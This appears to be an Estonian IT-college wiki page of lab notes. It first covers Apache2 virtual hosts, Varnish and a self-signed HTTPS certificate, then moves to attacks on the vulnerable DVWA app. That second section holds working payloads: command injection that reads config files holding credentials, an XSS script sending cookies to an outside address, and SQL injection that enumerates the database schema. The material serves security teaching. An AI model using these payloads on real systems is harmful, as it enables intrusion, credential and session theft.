Virtualhost apache2 näitel

From ICO wiki
Jump to navigationJump to search
The printable version is no longer supported and may have rendering errors. Please update your browser bookmarks and please use the default browser print function instead.
/etc/hosts

192.168.56.101  www.planet.zz
192.168.56.101  sales.planet.zz

ping www.planet.zz

ping sales.planet.zz    


apt-get update     
apt-get dist-upgrade

apt-get install apache2

mkdir -p /var/www/www.planet.zz
mkdir -p /var/www/sales.planet.zz
cp /var/www/index.html /var/www/www.planet.zz
cp /var/www/index.html /var/www/sales.planet.zz
vim /var/www/www.planet.zz/index.html
vim /var/www/sales.planet.zz/index.html
cp /etc/apache2/sites-available/default /etc/apache2/sites-available/www.planet.zz
cp /etc/apache2/sites-available/default /etc/apache2/sites-available/sales.planet.zz

vim www.planet.zz 
vim sales.planet.zz 

a2ensite www.planet.zz
a2ensite sales.planet.zz 
service apache2 reload

Varnish

Esmaselt tõstame apache2 porti 8080 

/etc/apache2/ports.conf
NameVirtualHost *:8080
Listen 8080

cd /etc/apache2/sites-available
sed 's/:80/:8080/' default -i
sed 's/:80/:8080/' wp -i
sed 's/:80/:8080/' sales.planet.zz -i
sed 's/:80/:8080/' www.planet.zz -i
service apache2 restart
netstat -lntp
apt-get install varnish
vim /etc/default/varnish

DAEMON_OPTS="-a :80 \
             -T localhost:6082 \
             -f /etc/varnish/default.vcl \
             -S /etc/varnish/secret \
             -s malloc,256m"

Faili /etc/varnish/default.vcl lisada X-Forwarded-For sedmine 

sub vcl_recv {

  # Add a unique header containing the client address

  remove req.http.X-Forwarded-For;

  set    req.http.X-Forwarded-For = client.ip;

  # [...]

}


service varnish restart

DVWA ründed

HTTPS konfigureerimine

ssh-keygen


Generating public/private rsa key pair. Enter file in which to save the key (/root/.ssh/id_rsa): /etc/ssl/private/www.planet.zz.key 

Enter passphrase (empty for no passphrase): 
Enter same passphrase again: 
Your identification has been saved in /etc/ssl/private/www.planet.zz.key.
Your public key has been saved in /etc/ssl/private/www.planet.zz.key.pub.
The key fingerprint is:
76:6e:6a:b4:1b:75:7e:39:18:12:59:ee:9c:4c:b9:ef root@server
The key's randomart image is:
+--[ RSA 2048]----+
|            .    |
|           + .   |
|          o +    |
|           * o   |
|        S + O    |
|       ..+ + + . |
|       ...o o =  |
|        o+   o . |
|       .o.    E  |
+-----------------+

openssl req -new -key /etc/ssl/private/www.planet.zz.key -out /root/www.planet.zz.req


sudo openssl x509 -req -days 3650 -in /root/www.planet.zz.req -signkey /etc/ssl/private/www.planet.zz.key -out /etc/ssl/certs/www.planet.zz.pem 

Signature ok
subject=/C=EE/ST=Harjumaa/L=Tallinn/O=Planet/OU=IT/CN=www.planet.zz
Getting Private key

cp /etc/apache2/sites-available/default-ssl /etc/apache2/sites-available/www.planet.zz-ssl

Seal muuta sisu (sert, dokument root, keyfail)

Lisa ServerName, Muuda DocumentRoot, Muuda SSLCertificateFile ja SSLCertificateKeyFile 

ServerName      www.planet.zz
DocumentRoot /var/www/www.planet.zz
SSLCertificateFile    /etc/ssl/certs/www.planet.zz.pem
SSLCertificateKeyFile /etc/ssl/private/www.planet.zz.key


a2enmod ssl

a2ensite www.planet.zz-ssl

service apache2 restart

ID kaart

ID kaardiga autentimine Apache2 veebiserveriga


DVWA ründed

cmd exec

8.8.8.8; sed 's/</UUUU/' ../../config/config.inc.php



8.8.8.8; ls -l 
8.8.8.8; ls -l ../
8.8.8.8; ls -l ../../
#jne, kuni kõik failid/kataloogid on teada
8.8.8.8; sed 's/<//'  ../../../../wordpress/wp-config.php


Loon faili kala /var/tmp kataloogi 

8.8.8.8; touch /var/tmp/kala.txt

Ning kontrollin kas fail loodi 

8.8.8.8; ls /var/tmp/


Kuidas teada saada, kas küpsised on JavaScriptile kasutamiseks lubatud või mitte. Lahendus kasutab command execution'it (XSS auku pole leitud, ei saa kasutada, ...) 

; grep session.cookie_httponly /etc/php5/apache2/php.ini

Väljund:

  • kui küpsised ei ole JavaScriptile loetavad, siis on väljund selline:

session.cookie_httponly = 1

  • kui küpsised on JavaScriptile loetavad, siis on väljund selline (HINT: Tegutse ruttu! :))

session.cookie_httponly = 0

XSS

<script>var i='<img src="http://192.168.56.101/'+document.cookie+'" />'; document.write(i);</script>

veel XSSi

%3Cscript%3Evar+i%3D%27%3Cimg+src%3D%22http%3A%2F%2F192.168.56.101%2F%27%2Bdocument.cookie%2B%27%22+%2F%3E%27%3B+document.write%28i%29%3B%3C%2Fscript%3E

SQLi

#blind
1' union select BENCHMARK(100000000,ENCODE('hello','goodbye')),1; # --


2' union select TABLE_SCHEMA, TABLE_NAME from information_schema.tables;# --


3' union  select TABLE_NAME,COLUMN_NAME from information_schema.columns; # --
Retrieved from "https://wiki.itcollege.ee/index.php?title=Virtualhost_apache2_näitel&oldid=62888"